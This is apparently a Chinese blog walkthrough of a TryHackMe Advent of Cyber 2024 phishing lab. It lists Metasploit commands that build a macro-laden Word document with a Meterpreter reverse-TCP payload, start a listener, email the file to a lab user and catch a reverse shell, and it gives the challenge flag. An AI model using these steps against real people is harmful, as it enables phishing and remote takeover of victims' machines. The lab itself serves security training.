靶场系列一: Day 10 Walk-through【TryHackMe: Advent of Cyber 2024】

158 阅读1分钟

零基础可以看下老外这段导读视频

在今天的挑战中,我们将对 Marta May Ware 进行安全评估。目的是改善她的安全状况,提高她的网络安全意识,防范未来的攻击。

让我们来看看这个故事好吗?

image.png

学习目标

了解网络钓鱼攻击的原理
了解文档中的宏如何被使用和滥用
学习如何使用宏进行网络钓鱼攻击

基本术语

1735726178546.jpg

image.png

image.png 现在让我们进入正题

创建额意文档

让我们在attackbox中运行这些代码。

msfconsole    /**/
set payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word macro
set LHOST 10.10.0.176
set LPORT 8888
show options
exploit

完成后,我们会得到如下结果,文件保存在 /root/.msf4/local/msf.docm 中

image.png

监听传入连接

在终端 run以下代码以建立监听连接:

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.0.176
set LPORT 8888
show options
exploit

一旦监听端口开启,我们就可以继续发送恶意文件
目标用户: marta@socmas.thm

image.png 附加额易文件,然后点击发送按钮。

44348875e557686737bd6926319aa23.png 发送后,我们等待反向连接。

只需几秒钟,我们就会得到一个反弹shell。

image.png 导航到管理员桌面,我们将找到 flag.txt 文件。

答案是 THM{phishing_christmas}

如果您喜欢这项挑战,并有兴趣了解更多信息,请随时查看网络钓鱼模块。

有趣吧?第 11 天见